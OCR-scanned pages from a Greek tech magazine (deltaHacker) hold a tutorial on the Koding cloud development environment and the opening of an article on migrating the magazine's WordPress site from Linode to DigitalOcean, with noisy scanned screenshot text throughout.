άλλους developers. 


του Κώστα Βεντούρα 


H κατασκευή εφαρμογών για το web προὐποθέτει την εγκατάσταση µιας σειράς 
εργαλείων ή/και βιβλιοθηκών. Κατ’ αρχάς, για τις αμέτρητες δοκιμές που εἰναι 
βέβαιο ότι θα πραγµατοποιήσουµε, χρειαζόμαστε έναν ολοκληρωμένο web server. 
Όσοι χρησιμοποιούμε Linux, μπορούμε κάλλιστα va εγκαταστήσουµε το τρίπτυχο 
Apache, MySQL και PHP. Οι χρήστες των Windows, όμως, πρέπει να καταφύγουν σε 
κάποιο VM ή σε κάποιο πακέτο τύπου WAMP, ΧΑΜΡΡ κ.ο.κ. Κι εφόσον έχουµε εξα- 
σφαλίσει αυτή τη βασική υποδομή, πρέπει va στήσουµε το κατάλληλο περιβάλλον 
εργασίας. [ta κάποιους µπορεί να αρκεί ένας απλός text editor και μερικές βιβλιοθή- 
KEÇ, ενώ άλλοι χρήστες ενδέχεται να ἐχουν συνηθίσει σε παραφουσκωμένα TEPL- 
βάλλοντα ανάπτυξης, που προορίζονται ειδικά για την κατασκευή ιστοσελίδων και 
web-applications. Ακόμα κι αν έχετε εγκαταστήσει όλα τα παραπάνω στο δικό σας 
σύστημα, υποψιαζόµαστε ότι το πρόβλημα rou collaboration παραμένει άλυτο. Στο 
Δίκτυο προσφέρονται αρκετές έτοιμες λύσεις, αλλά είναι ξεκομμένες από ra εργα- 
λεία που τρέχουν στον υπολογιστή µας και, arc αυτή την άποψη, εἶναι κάπως "ξένες". 


Στο παρόν άρθρο θα γνωρίσουμε την υπηρεσία Koding, που ενσωματώνει όλα όσα 
χρειαζόμαστε για την ανάπτυξη ιστοσελίδων και web-applications σ’ éva ενιαίο και 
εύχρηστο περιβάλλον. Θα τη βρείτε στην τοποθεσία https://koding.com και στη- 
ρίζεται εξ ολοκλήρου στη λογική rou cloud. Πα να αντιληφθείτε το εύρος των Õu- 
ατοτήτων που προσφέρει, σκεφτείτε ότι αµέσως μετά την εγγραφή αποκτάμε 
ρόσβαση σε éva ατομικό virtual machine που τρέχει Ubuntu. Σε αυτό το σύστημα 
πορούμε να αποθηκεύουµε και να επεξεργαζόµαστε αρχεία ελεύθερα,να εκτελού- 
επρογράµµατα µέσω terminal και να βλέπουμε τις ιστοσελίδες που κατασκευάζου- 
€ ATÓ το προσωπικό µας subdomain. Το εικονικό σύστηµα ευθύς εξαρχής υποστη- 
ἰζει όλες τις δημοφιλείς γλώσσες προγραμματισμού (PHP, Python, Ruby, Perl, Go 
4), διευκολύνει την εγκατάσταση πολλών CMS, frameworks και βιβλιοθηκών, ενώ 
υνοδεύεται κι από éva εύχρηστο web interface. Όπως υποψιάζεστε, το εν λόγωπε- 
ιβάλλον διαθέτει έναν code editor, υποστηρίζει τη συνεργασία (collaboration) µε àA- 
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λους χρήστες της υπηρεσίας, ενώ προσφέρει και λειτουργίες που θυμίζουν social 
network. Τέλος, όσοι εἶναι διατεθειμένοι να καταβάλουν το σχετικό αντίτιμο για να 
αποκτήσουν premium λογαριασμό, έχουν τη δυνατότητα να στήσουν περισσότερα 
virtual machines, µε αυξημένη επεξεργαστική ισχύ και μεγαλύτερο αποθηκευτικό 


χώρο. 

Πατις ανάγκες της παρουσίασης χρησιµοποιήσαµε τη δωρεάν εκδοχή της υπηρεσί- 
ας, που όπως θα διαπιστώσετε δεν είναι καθόλου ευκαταφρόνητη. Ας πάρουμε τα 
πράγματα από την αρχή. 


E Koding 


##Welcome to Koding...You've said goodbye to localhost! 
O koding-vm-O 


My Workspace 


Here are a few additional commonly asked questions. For more, head 
over to Koding University at http://learn.koding.com 


Some things to note 
e default w vot is 
y fil 


le that 


kostasvs: ~ S ll 


X." Kostas 


To web interface του Koding. Στην εικόνα διακρίνονται τέσσερεις 
βασικές περιοχές: sidebar, file tree, text editor kat terminal emulator. 


Αναγνωριστική περιήγηση 


Αμέσως µετά την εγγραφή µας στο site µεταφερόμαστε στο κύριο περιβάλλον ερ- 
γασίας (workspace) του Koding. Ολόγος για τον οποίο το χαρακτηρίζουμε ως κύριο’, 
εἶναι γιατί μπορούμε να δημιουργήσουμε και δικά µας. Σε αυτό το αρχικό περιβάλ- 
λον, τέλος πάντων, διακρίνουμε τις εξής τέσσερεις περιοχές: 


1. Sidebar. Βρίσκεται στο αριστερό άκρο του περιβάλλοντος και εμφανίζει τις 
εικονικές μηχανές και τα αντίστοιχα workspaces που ενδέχεται να έχουμε 
αποθηκεύσει. Από την ίδια περιοχή αποκτάµε πρόσβαση και στις “κοινωνικές” 
λειτουργίες rou Koding, όπως επίσης και στις ρυθμίσεις του λογαριασμού µας 
(το σχετικό κουμπάκι βρίσκεται χαμηλά, δίπλα στο avatar). 


2. File tree. Ακριβώς δεξιά από το sidebar συναντάμε το file tree της εικονικής 
μηχανής. Μια περιοχή που θα επισκεπτόµαστε συχνά από εδω, εἶναι ο φάκε- 
λος Web εντός του προσωπικού µας καταλόγου (home directory). Πρόκειται 
για το Document Root του προεγκατεστηµένου web server. Όσα αρχεία τοπο- 
θετούµε εκεἰ µέσα γίνονται δημοσίως προσβάσιμα απὀ το προσωπικό µας 
subdomain (θα πούμε περισσότερα στη συνέχεια). 
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3. Text editor. H δεξιά περιοχή του περιβάλλοντος χωρίζεται σε δύο οριζόντια 
τμήματα. Το πάνω από αυτά αποτελεί τον ενσωματωμένο επεξεργαστή KEL- 
μένου. O εν λόγω editor υποστηρίζει πολλές γλώσσες προγραμματισμού, 
επιτρέπει την επεξεργασία διαφορετικών αρχείων σε διαφορετικές KAP- 
τέλες (tabs) και προσφέρει ευκολίες όπως το syntax highlighting και ro auto 
completion. 


4. Terminal. Κάτω δεξιά συναντάμε έναν terminal emulator. Κανένα σύνολο KOU- 
μπιών και αυτοματισμώὠν δεν µπορεί να υποκαταστήσει την αμεσότητα της 
γραμμής εντολών. Από εκεί έχουµε rov πλήρη έλεγχο της εικονικής μηχανής! 
Όπως και o text editor, το terminal emulator υποστηρίζει το άνοιγμα πολλών 
tabs, για την παράλληλη εκτέλεση διαφόρων εργασιών. 


Κάνοντας τα πρώτα βήματα στο περιβάλλον του Koding, είναι πιθανό να γεννηθούν 
διάφορα ερωτήματα σχετικά µε τη μία ñ την άλλη λειτουργία. Κατά πάσα πιθανό- 
τητα, αυτά τα ερωτήματα θα έχουν ήδη απαντηθεί στο λεγόμενο Koding University 
(http://learn.koding.com) και, συγκεκριµένα, στην περιοχή rou FAQ. O πιο γρήγορος 
τρόπος για να επισκεφθούμε αυτή τη σελίδα είναι να κάνουμε κλικ στο εικονίδιο 
µε το λατινικό ερωτηματικό, στο κάτω δεξιό άκρο του περιβάλλοντος. Παρεμπι- 
πτόντως, ακριβώς δίπλα (στα αριστερά) εμφανίζεται éva ακόµα εικονίδιο που εἰναι 
πιθανό να µας φανεί χρήσιμο κατά τη γνωριμία µε το Koding. Πρόκειται για ένα µι- 
κρό πληκτρολόγιο και, αν κάνουμε κλικ επάνω του, εµφανίζεται éva παράθυρο µε 
όλα τα keyboard shortcuts. Από εκεί μπορούμε να δούμε όλες τις λειτουργίες που 
ἔχουν αντιστοιχιστεί σε πατήματα πλήκτρων, όπως επίσης και να ορίσουμε νέες 
συντομεύσεις. 


Q koding-vm-0 is turned off. 


TURN IT 


Μετά από 60 λεπτά αδράνειας η εικονική μηχανή του Koding 
απενεργοποιείται. Την επόµενη φορά που θα συνδεθούµε, εμφανίζεται 
ένα παράθυρο που µας προτρέπει va εκκινήσουµε το σύστημα εκ νέου. 
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Βασικές ρυθμίσεις κι ένα καλωσόρισμα 


Το περιβάλλον του Koding επιτρέπει τον προγραμματισμό σε διάφορες γλὠσσες, 
αλλά έχει έναν ξεκάθαρο προσανατολισμό στην ανάπτυξη ιστοσελίδων και web 
applications. Ακριβώς γι αυτό οι εικονικές μηχανές rou Koding είναι εφοδιασµέ- 
γες µε rov Apache, ενώ δημιουργείται αυτόματα κι éva subdomain που παραπέμπει 
στην εικονική µας μηχανή. Όλα αυτά όµως τα έχουµε ξαναπεί. Πώς θα μάθουμε το 
subdomain και την ακριβή διεύθυνση που παραπέμπει στον προσωπικό µας web 
server; 


<!DOCTYPE html> 

«html lang="en"> 
<head> 

«meta charset-"utf-8"» 


.config 
Applications 


Backup 


«link href-'//fonts.googleapis.com/css?family-Open«Sans 


Documents 


web 
ellobox"» 


index.html coding. »Koding.com«/a»«/header» 
«h1»Hello World!«/hl» 


perl.pl MEE HTML 


php.php 
python.py 
P ruby.rb 
kostasvs: ~ S Bl 
P .bash history 
P .bashrc 


IP README.md 


Κάθε καινούργιος λογαριασμός στο Koding περιλαμβάνει µια default ιστοσελίδα, της οποίας ra 
αρχεία βρίσκονται στον κατάλογο Web, µέσα στο home directory (—/Web). 


Αυτές οι πληροφορίες βρίσκονται στις ρυθμίσεις της εικονικής μηχανής. Μετακι- 
νώντας το ποντίκι στην περιοχή rou sidebar kat πάνω από το όνομα της μηχανής 
(το “εργοστασιακό’ όνοµα είναι koding-vm-0) εμφανίζεται ένα κυκλικό εικονίδιο µε 
αποσιωπητικά. Από εκεί μπορούμε va εµφανίσουµε ένα παράθυρο που περιλαμβά- 
VEL TIG ρυθμίσεις και τα βασικά χαρακτηριστικά της εικονικής μηχανής. To εν λόγω 
παράθυρο είναι χωρισμένο σε καρτέλες, που βρίσκονται σε κατακόρυφη διάταξη 
στα αριστερά. H ακριβής διεύθυνση που παραπέμπει στη μηχανή µας φαίνεται στην 
αρχική καρτέλα (General), στο πεδίο Assigned URL. Όσο yta ro subdomain --αν κι εξά- 
γεται εύκολα από ro URLS, μπορούμε να ro βρούμε στην καρτέλα "Domains". Όπως 
βλέπετε, το subdomain που αντιστοιχίστηκε στο εικονικό µας σύστημα έχει τη µορ- 


(pn: 
«username» .koding.io 
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Όπου ro «username» αποτελεί το όνοµα χρήστη ue ro οποίο γραφτήκαμε oro Koding. 
Μήπως αναρωτιέστε γιατί το subdomain εµφανίζεται σε διαφορετική περιοχή από 
το λεγόμενο Assigned URL; Αφενός, το συγκεκριµένο URL παράγεται αυτόματα 
κατά τη δηµιουργία της εικονικής μηχανής, εἶναι αδύνατο να το τροποποιήσουμε 
και ισχύει για όσο υφίσταται και η εικονική μηχανή. Αφετέρου, τα subdomains που 
εμφανίζονται στην καρτέλα Domains μπορούν να ενεργοποιούνται και να απενεργο- 
ποιούνται κατά βούληση. Εξάλλου, ο χρήστης µπορεί να δημιουργεί επιπρόσθετα 
sub-subdomains, κάτω από το γενικό subdomain (µπορεί, δηλαδή, να φτιάχνει διευ- 
θύνσεις της µορφής KÁTL.<USername>.koding.io). 


VM Settings 


O General On/Off 
E Koding 
Keep VM always on 
Nickname 
koding-vm-O 


Public IP 
My Workspace 


Assigned URL 


Τοποθετώντας ro ποντίκι επάνω στο όνομα της εικονικής μηχανής 
και κάνοντας κλικ στο κουμπάκι που εμφανίζεται, ανοίγει ένα 
παράθυρο ρυθμίσεων. Εκεί βρίσκουμε τη διεύθυνση (assigned URL) 
που παραπέμπει στον web server της εικονικής µας μηχανής. 


H χρησιμότητα των sub-subdomains και πολύ περισσότερο η ρύθμιση του Apache 
για την αξιοποίησή τους, ξεφεύγει από το σκοπό του άρθρου. Ας επιστρέψουµε Aoc 
nóv στην καρτέλα General, του παραθύρου pe τις ρυθμίσεις. Εκεί εμφανίζονται us- 
ρικές ενδιαφέρουσες επιλογές. Κατ’ αρχάς, από το πεδίο Nickname μπορούμε να 
τροποποιήσουµε το όνομα της εικονικής μηχανής. Αυτό δεν έχει ιδιαίτερο νόημα 
στην περίπτωση που διαθέτουμε μόνο ένα VM, αλλά εἶναι σίγουρο ότι θα ικανοποιή- 
σειτην εσωτερική µας μανία για τάξη) Λίγο παραπάνω εμφανίζεται µια επιλογή για 
τη μόνιμη διατήρηση του συστήµατος σε λειτουργία. H συγκεκριμένη ρύθμιση είναι 
εξ ορισμού απενεργοποιηµένη. Έτσι, αν περάσουν 60 λεπτά χωρίς να εκτελέσουµμε 
κάποια εντολή στο τερματικό και χωρίς νατροποποιήσουµε κάποιο αρχείο, N εικονι- 
κή μηχανή απενεργοποιείται. Αυτό συμβαίνει για λόγους εξοικονόμησης ενέργειας 
και πόρων συστήµατος και δεν πρέπει να σας ανησυχεί. Την επόμενη φορά που θα 
συνδεθούµε oro Koding, το σύστηµα θα εμφανίσει ένα πλαίσιο διαλόγου p' éva KOU- 
uni για την ενεργοποίηση της εικονικής μηχανής. Kará ra άλλα, οιρυθµίσεις µας και 
οι διάφορες καρτέλες (του editor ή και του terminal) θα βρίσκονται όπως ακριβώς 
τις αφήσαμε. Αν δεν αναπτύσσουµε κάποια εφαρµογή που απαιτεί συνεχή λειτουρ- 
yia, καλό θα ήταν να µην πειράξουµε τη συγκεκριμένη ρύθμιση. Όπως και να χει, 
ακριβώς από πάνω βρίσκεται éva κουμπί για τον τερματισμό και την εκκίνηση της 
εικονικής μηχανῆς, οποιαδήποτε στιγµή το θελήσουμε. 
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ΡΥΤΗΟΝ PERL 


This is an example page running plain HTML on your Koding Virtual Machine (VM). This web page is being 
served by the apache web server. 
To learn more about how we have configured the apache, you should read this simple quide. 


You can create your own simple HTML/web page "Hello World" either by changing this file 
(index.html) or by adding a new file in the "Web" directory found inside the home directory of your 
user account on the VM (/home/your username/Web). 


Also visit Koding University for a ton of interesting content on how you can do amazing things with 
Koding! 


H εικονική μηχανή που δημιουργεί ro Koding ενσωματώνει τον Apache 


web server και αυτός µε τη σειρά rou περιλαμβάνει µια δοκιμαστική 
σελίδα. Μην περιμένετε το βαρετό Καλωσόρισμα του Apache. 


E 


Oh no... kostasvs.koding.io is sleeping right now 


Όταν η εικονική µας μηχανή έχει απενεργοποιηθεί, ro Koding αναλαμβάνει va εμφανίζει ένα 
φιλικό μήνυμα σε όσους επισκέπτονται το προσωπικό µας subdomain. 
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Νομίζουμε ort δεν χρειάζεται να αναλωθούμε περισσότερο στις ρυθμίσεις της 
πλατφόρμας. Σ' αυτό το στάδιο μπορούμε va μεταβούμε στο URL ἡ στο subdomain 
που έχει αντιστοιχιστεί στην εικονική μηχανή µας. Εκεί θα βρούμε ένα απλό αλλά 
ζεστό καλωσόρισμα στην πλατφόρμα Koding, γραμμένο σε HTML. Μήπως δυσκο- 
λεύεστε να πιστέψετε ότι αποκτήσατε τον πλήρη έλεγχο ενός web server, χωρίς 
την παραμικρή ταλαιπωρία και χωρίς va ξοδέψετε δεκάρα; Εμείς πάντως αυτό TÁ- 
Bape και σπεύσαµε να σχοληθούμε µε το καινούργιο µας παιχνίδι. 


Backup Backup 


Documents Documents 
Web 
perl.pl 
php.php 
python.py 
ruby.rb 


index.h! 


.bashrc 


README.md 


Με δεξί κλικ στον κατάλογο Web και επιλέγοντας "New File" 
από το μενού, δημιουργούμε το πρώτο µας αρχείο. 


Το πρώτο πείραμα 


Εφόσον το Koding προορίζεται για την ανάπτυξη ιστοσελίδων και web applications, 
το πρώτο πράγμα που σκεφτήκαμε να φτιάξουμε ήταν µια απλή ιστοσελίδα. Ma το 
σκοπό αυτό, µεταβήκαμε στο home directory από τη μεσαία περιοχή του περιβάλλο- 
ντος εργασίας και κάναμε δεξί κλικ στον κατάλογο Web. Από το μενού που εμφανί- 
στηκε επιλέξαμε το New File και μ' αυτόν τον τρόπο δημιουργήθηκε ένα νέο αρχείο 
εντός του καταλόγου. Όπως αναφέραμε και νωρίτερα, ο συγκεκριμένος κατάλο- 
γος αποτελεί το προεπιλεγµένο Document Root για τον web server. Το αρχείο που 
δημιουργήσαμε θα περιλαμβάνει τον κώδικα της δοκιμαστικής µας σελίδας και TO 
ονομάσαμε mypage.php. Αμέσως µετά κάναμε επάνω του δεξί κλικ και επιλέξαμε 
TO “Open File". Έτσι, δημιουργήθηκε µια νέα καρτέλα του text editor, στην οποία πλη- 
κτρολογήσαμε τα ακόλουθα: 
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«html» 
«head» 
«title»Hello World«/title» 
«link rel="stylesheet" hrefz"//koding.com/hello/css/style.css"» 
</head> 
<body class="php"> 
<h1>Hello World</h1>" 


<?php 
$ip = $_SERVER ['REMOTE_ADDR']; 
echo "«h2»Your IP address is: " . $ip . "«/h25"; 
?> 
</body> 


</html> 


Όπως βλέπετε, ο κώδικας που εισαγάγαµε αποτελεί µια απλοϊκή σελίδα µε λίγο 
κώδικα PHP, yta την προβολή της διεύθυνσης IP του εκάστοτε επισκέπτη. Παρατη- 
ρείστε ότι για λόγους συντοµίας αξιοποιήσαµε το stylesheet που έχουν κατασκευά- 
σει οι άνθρωποι του Koding και χρησιμοποιείται από την υπάρχουσα σελίδα (index. 
html). [ta rv αποθήκευση του αρχείου πατήσαμε τον κλασικό συνδυασμό πλήκτρων 
[CTRL+S]. Εναλλακτικά 8a μπορούσαμε να επιλέξουμε ro Save, απὀ το μενού της 
καρτέλας (εμφανίζεται αν τοποθετήσουµετο δείκτη του ποντικιού πάνω στο όνομά 
της). Στη συνέχεια, καθώς ro username που είχαμε δώσει κατά την εγγραφή στο 
Koding ήταν ro kostasvs, επισκεφθήκαµε τη διεύθυνση kostasvs.koding.io/mypage. 
php. Εκεί µας περίµενε το περιεχόµενο της δική µας σελίδας. 


E Koding 


<html> 

<head> 

<title>Hello World!</title> 

«link rel-"s ` href=" 
Applications </head> 
My Workspace «body class-"php"» 

Backup «hi»Hello World«/hi1»" 

<?php 


$ip = 


koding-vm-0 


Documents 
Web 
2» 
index.html </body> 
</html> 

perl.pl 

php.php 

python.py 

ruby. 

testpage.php 


README.md 


To πρώτο µας δημιούργημα στο περιβάλλον rou Koding: Πρόκειται για µια 
απλούστατη ιστοσελίδα που εμφανίζει τη διεύθυνση IP του εκάστοτε επισκέπτη. 
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Εμπλουτισµός από τη γραμμή εντολών 


Στις καρτέλες του terminal emulator μπορούμε να εργαστούμε όπως θα εργαζόµα- 
σταν και σε έναν οποιοδήποτε server µε Linux. Μην ξεχνάτε ότι το εικονικό σύστημα 
τρέχει Ubuntu. Έτσι, μπορούμε να χρησιμοποιήσουμε οποιοδήποτε πρόγραµµα από 
τα core utilities του Linux, όπως και άλλα, που απαντώνται σε όσες διανομές στη- 
ρίζονται στο Debian. [ia παράδειγµα, μπορούμε να εγκαταστήσουµε πακέτα µε το 
apt-get: 


$ sudo apt-get install mysql-server mysql-client 


Πάντως σε ότι αφορά στη διαχείριση του λογισμικού si 
ναι προτιμότερο να χρησιμοποιούμε τον  Koding package manager 
(http://learn.koding.com/guides/getting-started-kpm). Πρόκειται για ένα εργαλείο 
που έχουν κατασκευάσει οι άνθρωποι του Koding και το οποίο µπορεί να εγκαθιστά 
διάφορα frameworks, βιβλιοθήκες και CMS µε ευκολία. H εγκατάσταση της MySQL 
γίνεται ως εξής: 


$ kpm install mysql 


To terminal emulator rou Koding λειτουργεί ως µια 
“φυσιολογική” κονσόλα ενός συστήµατος Linux. 
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Αμέσως µετά, μπορούμε να προσθέσουμε ro WordPress, ro Drupal ñ οποιοδήποτε 
άλλο CMS, δίνοντας κάτι τέτοιο 


$ kpm install wordpress 
ο κάτι τέτοιο 
$ kpm install drupal 


Πα να μάθουμε ποια πακέτα υποστηρίζει ro kpm, αρκεί να χρησιμοποιήσουμε την 
παράμετρο list: 


$ kpm list 


Σημειώστε ότι µε αυτόν τον τρόπο εμφανίζονται «όλα τα πακέτα που µπορεί να 
εγκαταστήσει το kpm. H τεκμηρίωση του εργαλείου στο Koding University περιλαμ- 
βάνει μόνο μία ενδεικτική λίστα, που δεν πρέπει να θεωρείται πλήρης. 


Τα χάρισμα της κοινωνικότητας 


Το Koding, σε µια προσπάθεια να συγκροτήσει γύρω του µια ισχυρή κοινότητα χρη- 
στών, διευκολύνειτην ανταλλαγή απόψεων και ιδεών, όπως επίσης και την ομαδική 
εργασία σε κοινές (διαμοιραζόµενες) εικονικές μηχανές. Έτσι, παρέχει κάποιες ÕU- 
νατότητες που παραπέμπουν στα δημοφιλή µέσα κοινωνικής δικτύωσης (Facebook, 
Twitter κ.ά... Κατ’ αρχάς, περιλαμβάνει ένα message board, που μοιάζει µε διασταύ- 
ρωση των timeline Tou Facebook kat rou Twitter. Μόνο TOU TO συγκεκριµένο σύστημα 
διαθέτει πολλές διαφορετικές ροές αναρτήσεων, οι οποίες ονομάζονται κανάλια. 
Στο sidebar του web interface (τέρμα αριστερά) υπάρχει η ενότητα Channels, στην 
οποία αρχικά εμφανίζονται µόνο δύο κανάλια: 


* #public: Πρόκειται για την κεντρική ροή αναρτήσεων, στην οποία δημοσιεύο- 
νται *óAa* ra posts που δημιουργούν οι χρήστες 


e #changelog: Αυτό το κανάλι περιλαμβάνει μηνύματα απότους κατασκευαστές 
του Koding και ενημερώνει τους χρήστες για αλλαγές στον κώδικα της πλατ- 
φόρμας, για bux fixes κ.ο.κ. 


Οι αναρτήσεις στο message board του Koding μπορούν να περιλαμβάνουν κείµενο, 
links ñ εικόνες, ενώ επιτρέπουν και γνωστές ενέργειες: Οι χρήστες μπορούν να 
κάνουν like σε éva post ή/και να γράφουν σχόλια. Όταν σχολιάζει κάποιος µια δική 
μας ανάρτηση, το σύστηµα μάς ενημερώνει µε ειδοποίηση εντός web interface του 
Koding ή και µε email, av το ἔχουμε επιτρέψει από τις ρυθμίσεις. Στις αναρτήσεις 
μπορούμε va ενσωματώνουμε και hashtags (π.χ. #php, #wordpress ή οτιδήποτε άλλο 
σκεφτούμε). Αυτό βοηθά στη διαχείριση των αναρτήσεων, αφού τα posts που περι- 
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λαμβάνουν κάποιο συγκεκριµένο hashtag συγκροτούν ἐναομώνυμο κανάλι. Πάντως, 
στο κανάλι #public εμφανίζονται όλα ra posts, ακόµα και αν δεν περιέχουν κάποιο 
hashtag. Ma να δούµε τα διαθέσιµα κανάλια αρκεί να κάνουμε κλικ επάνω στη λέξη 
CHANNELS, στο sidebar. Από το παράθυρο που εμφανίζεται μπορούμε ναγραφτούμε 
σε οποιοδήποτε κανάλι θέλουμε, πατώντας το σχετικό κουμπί Follow. Τα κανάλια 
που "ακολουθούμε" εμφανίζονται μόνιμα στη λίστα των καναλιών rou sidebar. Όπως 
ήταν αναμενόμενο, για να δημιουργήσουμε µια ανάρτηση αρκεί να επισκεφθούμε 
κάποιο κανάλι και να χρησιμοποιήσουμε το text bpx που εμφανίζεται πάνω πάνω. 


Στην περίπτωση που δεν θέλουμε να εκφραστούμε δημόσια, μπορούμε να στείλου- 
µε προσωπικά μηνύματα σε οποιονδήποτε χρήστη (αυτὀ που στο Twitter ονομάζεται 
direct message). Για το σκοπό αυτό, αρκεί va τοποθετήσουμε το ποντίκι στο sidebar 
και πάνω στη λέξη MESSAGES. Στη συνέχεια, κάνοντας κλικ στο εικονίδιο που εμ- 
φανίζεται (αυτό µε τον χαρακτήρα +) ανοίγει évo παράθυρο µε πεδία για την εισα- 
γωγή του ονόματος του παραλήπτη, για την περιγραφή του θέματος του μηνύματος 
(PURPOSE) και φυσικά για το (oto το μήνυμα. Αφού στείλουμε κάποιο μήνυμα, το 
θέμα του μηνύματος θα προστεθεί στο sidebar ως µια νέα συνομιλία, κάτω από τη 
λέξη MESSSAGES. 


Πα το τέλος αφήσαμε µια ιδιαίτερα χρήσιμη λειτουργία. Αναφερόμαστε στη ζωντα- 
γή συνομιλία, µέσω γραπτών μηνυμάτων rj µέσω εικόνας και ήχου. H επικοινωνία 
αυτού του είδους επιτρέπει τη συνεργασία (collaboration) διαφορετικών χρηστών 
πάνω σε κάποιο project. Όταν ένας χρήστης δημιουργεί µια συνεδρία (session), η 
εικονική μηχανή και τα αρχεία του συγκεκριμένου χρήστη καθίστανται προσβάσιμα 


z Koding sapache2 g 


koding-vm-0 


SEND 


My Workspace 
foscamcan 
http://ufkkffbe3f01.foscamcan.koding.io/ is always on sleep mode, last time I test 


with #init 6# on command line, now VM web seems to die but server running? 


he2 
τ. #apache2 


Hello World from HTML by Koding 


You can create your own simple HTML/web page "Hello World" either by changing this file 
(index.html) or by adding a ne... 


zim111 liked this. 


Stefan Cosma 
Everything looks good on this end. Might be a DNS issue. If you still have issues please 


ο ram en iia ran dahi fiethar 


Στην περιοχή CHANNELS του sidebar εμφανίζονται τα κανάλια που παρακολουθούμε. Από την ίδια περιοχή 
μπορούμε να “ακολουθήσουμε” και πρόσθετα κανάλια, ώστε να βλέπουμε εύκολα τις σχετικές αναρτήσεις. 
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σε όλους όσοι συμμετέχουν στη συζήτηση. Πα να πετύχουμε κάτι τέτοιο αρκεί ένα 


κλικ στο “SHARE”, 6 


την κάτω αριστερή γωνίατου περιβάλλοντος. Από κεί και πέρα, 


μένει va προσθέσουμε τους επιθυμητούς συνομιλητές. 


#public 


Testing out K 


oding for #deltahacker magazine! 


Markdown preview 


Kostas 
EM p 


N SEND 


Previewing (x) 


ν 


Testing out Koding for #deltahacker magazine! 


Εφόσον κάνουμε κλικ επάνω σε κάποιο κανάλι και εμφανιστούν οι 
σχετικές αναρτήσεις, μπορούμε να χρησιμοποιήσουμε το πλαίσιο που 
εμφανίζεται πάνω-πάνω ώστε να δημιουργήσουμε ένα νέο post. 


Μετάβαση στα σύννεφα 


Οιλειτουργίες που 


προσφέρει ro Koding είναι σίγουρα εντυπωσιακές, αλλά ενδέχε- 


ται va σας ξενίσουν. Ειδικά στην αρχή, η ιδέα του να συγκεντρώνετε τη δουλειά σας 
σε κάποιο απομακρυσμένο virtual machine, είναι πιθανό να σας προκαλεί µια κάποια 
ανασφάλεια. Όσο κι αν ανησυχείτε τώρα, πιστεύουμε ότι αν εργαστείτε στο περι- 


βάλλον του Koding 


θα προσαρµοστείτε σχετικά γρήγορα. Στο κάτω-κάτω, κανένας 


δεν σας υποχρεώνεινα χρησιμοποιήσετε τις λειτουργίες που στα μάτια σας φαντά- 


ζουν εξωτικές ñ κα 


περιττές. Μπορείτε απλά να εκµεταλλευτείτε την ευκολία και 


την άνεση που προσφέρει ένα δωρεάν εικονικό σύστημα, το οποίο μάλιστα είναι και 
δημόσια προσβάσιμο από ένα φιλικό subdomain. Όταν αποκτήσετε την έμπνευση 


και την όρεξη να κα 


ταπιαστείτε µε κάποια καινούργια ιστοσελίδα ñ web application, 


μη διστάσετε να κάνετε την αρχή στο Koding. 
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Skill: Intermediate 
Tags: WordPress, VPS, MySQL, backup, SSH, security 


Μετακόµιση site σε 
νέο host & ενίσχυση 
της ασφάλειας 


Πρόσφατα χρειάστηκε να µετακομίσουμε ro site του deltaHacker, το οποίο 
βασίζεται στο WordPress, από τον VPS provider όπου βρισκόταν σε άλλον. Ένας 
από τους λόγους ήταν ra capital controls: σε αντίθεση µε τον παλιό, ο νέος VPS 

provider δέχεται πληρωμές :και' απὀ PayPal. Υπάρχουν βέβαια πολλοί άλλοι 
λόγοι για τους οποίους κάποιος θα ήθελε να μεταφέρει το WordPress site του. 
Στο παρόν άρθρο δείχνουμε τη διαδικασία που ακολουθήσαμε, σε όλη της τη 
λεπτομέρεια. 


του Χρήστου Βαρελά 


O παλιός VPS provider —ñ απλά host- όπου βρισκόταν το deltaHacker.gr, ήταν η 
Linode. Είμαστε πολλά χρόνια εκεί, δεν είχαμε το παραμικρό πρόβλημα κι αν δεν 
μας είχε πιάσει η pavia va συγκεντρώσουµε όλα µας ra VPS στη Digital Ocean, πιθα- 
νώς va αφήναμε ro deltaHacker στη Linode για αρκετό καιρό ακόµα. Εξαιτίας όµως 
των capital controls, συνειδητοποιήσαμε ότι η Linode δεν μπορούσε να χρεώσει την 
πιστωτική µας. Βεβαίως ούτε και η Digital Ocean μπορούσε να χρεώσει πιστωτική, 
αλλά σε αντίθεση µε τη Linode δέχεται πληρωμές *kar* από PayPal και το wallet 
μας εκεί εἶναι σε καλή κατάσταση. Στο σηµείο αυτό αξίζει να σημειώσουμε ὁτι και 
οι δύο εταιρείες γνώριζαν για τους περιορισμούς διακίνησης κεφαλαίων στη χώρα 
μας. Έδιναν μάλιστα περίοδο χάριτος µιας ñ δύο εβδομάδων - ἡ τουλάχιστον αυτό 
ισχύει τη στιγµή που γράφεται το παρόν. Μολαταύτα, επειδή στην πραγματικότητα 
δεν μπορούσαμε να είµαστε βέβαιοι για ro πότε θα αρθούν ot περιορισμοί, αποφασί- 
cape va μεταφέρουμε το deltaHacker.gr από τη Linode στη Digital Ocean µια wpa vw- 
ρίτερα. Διαβάστε τη διαδικασία που ακολουθήσαµε µε στόχονα ελαχιστοποιήσουµε 
τους χρόνους της προετοιμασίας, της µεταφοράς αλλά και του downtime. 


H όλη διαδικασία, πανοραµικά 


Γενικά, για λειτουργικό σύστηµα στα VPS µας προτιμούμε ro Ubuntu Server LTS. Ei- 
μαστε εξοικειωμένοι µε ro Ubuntu και πριν τη µεταφορά δεν βλέπαμε το λόγο να 
πειραματιστούμε µε κάποιο λειτουργικό σαν το CentOS - τουλάχιστον ὀχι για έναν 
server που προορίζεται γιατη φιλοξενία rou deltaHacker.>Tn Linode τρέχαµε Ubuntu 
Server 12.04 32bit LTS, αλλά για το VPS της Digital Ocean επιλέξαμε τη νεότερη ἐκ- 
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δοση LTS, την 14.04, και μάλιστα την εκδοχή 64bit. Σε κάθε περίπτωση, ro software 
stack πάνω στο οποίο βασιζόµαστε εἰναι το LEMP (Linux, nginx, MySQL και PHP). 
Δείτε λίγοτις ακόλουθες λίστες εργασιών, για µια µεταφορά σαν αυτή που πραγµα- 
τοποιήσαμε. 


Νέος host (για εμάς Digital Ocean) 
* δημιουργία VPS (µε Ubuntu Server LTS 14.04 64bit) 
* εγκατάσταση software stack (LEMP) 


ρυθμίσεις DNS, αλλά χωρίς να ενημερώσουμε τον registrar για τους νέους 
nameservers 


* ενηµέρωση και βασικές ρυθμίσεις συστήµατος, μέριμνα για ασφάλεια 


* εγκατάσταση απαραίτητων πακέτων για την ορθή λειτουργία του WordPress 
site 


Παλιός host (για εµάς Linode) 


